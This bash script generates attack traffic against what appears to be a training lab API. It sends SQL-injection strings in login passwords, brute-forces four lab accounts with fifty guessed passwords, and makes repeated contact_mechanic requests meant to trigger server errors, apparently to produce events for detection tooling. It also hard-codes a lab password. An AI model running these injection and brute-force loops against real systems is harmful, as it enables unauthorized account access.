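#!/bin/bash
#
# Traffic generator for a lab API host. It sends three batches of requests:
#   1. logins whose password field carries SQL-style metacharacter strings,
#   2. 50 rounds of wrong-password logins for each account,
#   3. authenticated contact_mechanic requests, 20 rounds for each account.
# The account names, endpoint paths and banner texts suggest it drives a
# training/lab deployment to produce events for detection tooling -- confirm
# with the lab owner.
#
# Requires: curl, jq.
#
# NOTE(review): every request uses plain http://, so the account password and
# the bearer token cross the network unencrypted. The original passed
# --insecure (skip TLS certificate verification) to curl; that flag has no
# effect on http:// URLs and is dropped here. If the lab moves to https://,
# verify certificates rather than re-adding it.

set -u

# Print a message to stderr and stop.
die() {
  printf 'error: %s\n' "$*" >&2
  exit 1
}

command -v curl >/dev/null || die "curl is required"
command -v jq >/dev/null || die "jq is required"

# Prompt the user to enter the value of HOSTNAME.
# HOSTNAME is also a variable bash sets on its own; the prompt overrides it
# for the lifetime of this script.
read -r -p "Enter the HOSTNAME: " HOSTNAME

# The value is interpolated into the request URL, the Origin/Referer headers
# and a JSON body, so accept only host, host:port or a bracketed IPv6 literal.
# This rejects empty input, whitespace, slashes, quotes and CR/LF.
readonly HOST_PATTERN='^[][A-Za-z0-9._:-]+$'
[[ "$HOSTNAME" =~ $HOST_PATTERN ]] \
  || die "HOSTNAME must be a bare host or host:port"
readonly BASE_URL="http://$HOSTNAME"

# Define the email addresses
readonly EMAILS=(
  'apilab@akamai.com'
  'apilab2@akamai.com'
  'apilab3@akamai.com'
  'apilab4@akamai.com'
)

# Define the list of passwords (entries kept verbatim from the original list)
readonly PASSWORDS=(
  '-'
  ' '
  '&'
  '^'
  '*'
  ' or ''-'
  ' or '' '
  ' or ''&'
  ' or ''^'
  ' or ''*'
  "-"
  " "
  "&"
  "^"
  "*"
  " or ""-"
  " or "" "
  " or ""&"
  " or ""^"
  " or ""*"
  'or true--'
  "or true--"
  'or true--'
  ') or true--'
  "') or true--"
  "') or true--"
)

# Define the common password
# NOTE(review): this credential is hard-coded in the script. It can now be
# overridden from the environment; treat the built-in value as a lab-only
# default and do not reuse it anywhere else.
readonly DEFAULT_LAB_PASSWORD='cRaPi2023!!!'
COMMON_PASSWORD=${COMMON_PASSWORD:-$DEFAULT_LAB_PASSWORD}

# Define VINs. VINS[i] is used together with EMAILS[i]; presumably each VIN
# belongs to the account at the same index -- confirm against the lab data.
readonly VINS=(
  "8WNFQ29UASO325881"
  "2QJHA06QPTA452548"
  "9MZWD50MITK534430"
  "2QBSC54ZIHY224823"
)

# Browser-like headers shared by every request. The User-Agent is kept on one
# line so that no line break ends up inside the header value.
readonly BROWSER_HEADERS=(
  -H 'Accept: */*'
  -H 'Accept-Language: en-CA,en-GB;q=0.9,en-US;q=0.8,en;q=0.7,de;q=0.6'
  -H 'Cache-Control: no-cache'
  -H 'Connection: keep-alive'
  -H 'Content-Type: application/json'
  -H 'DNT: 1'
  -H "Origin: $BASE_URL"
  -H 'Pragma: no-cache'
  -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'
)

#######################################
# Build the JSON body for the login endpoint.
# jq does the string encoding, so a value containing a double quote or a
# backslash still yields well-formed JSON.
# Arguments: $1 - email, $2 - password
# Outputs:   one-line JSON object on stdout
#######################################
login_body() {
  jq -cn --arg email "$1" --arg password "$2" \
    '{email: $email, password: $password}'
}

#######################################
# POST one login attempt with the shared browser-like headers.
# Arguments: $1 - email, $2 - password
# Outputs:   the response body on stdout (curl progress goes to stderr)
#######################################
post_login() {
  local body
  body=$(login_body "$1" "$2") || return
  curl "$BASE_URL/identity/api/auth/login" \
    "${BROWSER_HEADERS[@]}" \
    -H "Referer: $BASE_URL/login" \
    --data-raw "$body" \
    --compressed
}

#######################################
# Function to obtain access token for a given email and password.
# Arguments: $1 - email, $2 - password
# Outputs:   the token on stdout; an empty line when the response carries no
#            token (failed login, non-JSON reply, unreachable host)
#######################################
get_access_token() {
  local email=$1
  local password=$2
  local body
  local access_token

  body=$(login_body "$email" "$password") || return
  # Declaration and assignment are separate so 'local' cannot mask a failure.
  # '// empty' turns a missing token into an empty string, not "null".
  access_token=$(curl -s "$BASE_URL/identity/api/auth/login" \
    -H 'Content-Type: application/json' \
    --data-raw "$body" | jq -j '.token // empty')
  printf '%s\n' "$access_token"
}

#######################################
# POST one contact_mechanic request.
# Arguments: $1 - bearer token, $2 - VIN, $3 - mechanic_code
# Outputs:   the response body on stdout
#######################################
post_contact_mechanic() {
  local token=$1
  local vin=$2
  local mechanic_code=$3
  local body

  body=$(jq -cn \
    --arg code "$mechanic_code" \
    --arg vin "$vin" \
    --arg api "$BASE_URL/workshop/api/mechanic/receive_report" \
    '{mechanic_code: $code, problem_details: "123", vin: $vin,
      mechanic_api: $api, repeat_request_if_failed: false,
      number_of_repeats: 1}') || return
  curl "$BASE_URL/workshop/api/merchant/contact_mechanic" \
    "${BROWSER_HEADERS[@]}" \
    -H "Authorization: Bearer $token" \
    -H "Referer: $BASE_URL/contact-mechanic?VIN=$vin" \
    --data-raw "$body" \
    --compressed
}

echo "GENERATING REQUESTS FOR LOGIN ENDPOINT WITH SQL PAYLOAD"

# The original single-quoted the URL and headers and used $'...' for the
# body, so $HOSTNAME, $email and $password were sent as literal text. The
# request is now built the same way as in the other two batches.
for email in "${EMAILS[@]}"; do
  for password in "${PASSWORDS[@]}"; do
    post_login "$email" "$password" >/dev/null 2>&1
  done
done

echo "----------------COMPLETE---------------------------------"

echo "GENERATING REQUESTS FOR LOGIN ENDPOINT TO TRY DIFFERENT PASSWORDS FOR BRUTE FORCE AUTHENTICATION"

# Define the password range
for ((i = 1; i <= 50; i++)); do
  PASSWORD="pass$i"
  for email in "${EMAILS[@]}"; do
    # The response is printed through jq, so each rejection is visible.
    post_login "$email" "$PASSWORD" | jq -j .
  done
done

echo "----------------COMPLETE---------------------------------"

echo "GENERATIC REQUESTS FOR CONTACT MECHANIIC ENDPOINT FOR 5XX SERVER ERRORS"

for ((x = 1; x <= 20; x++)); do
  for ((i = 0; i < ${#EMAILS[@]}; i++)); do
    # Generate access token
    ACCESS_TOKEN=$(get_access_token "${EMAILS[i]}" "$COMMON_PASSWORD")
    if [[ -z "$ACCESS_TOKEN" ]]; then
      # Without a token the requests below would go out unauthenticated and
      # the run would log something other than what the banner announces.
      printf 'warn: no access token for %s, skipping\n' "${EMAILS[i]}" >&2
      continue
    fi

    VIN=${VINS[i]}

    # Two requests per account and round; they differ only in mechanic_code.
    post_contact_mechanic "$ACCESS_TOKEN" "$VIN" "T567" >/dev/null 2>&1
    post_contact_mechanic "$ACCESS_TOKEN" "$VIN" "123" >/dev/null 2>&1
  done
done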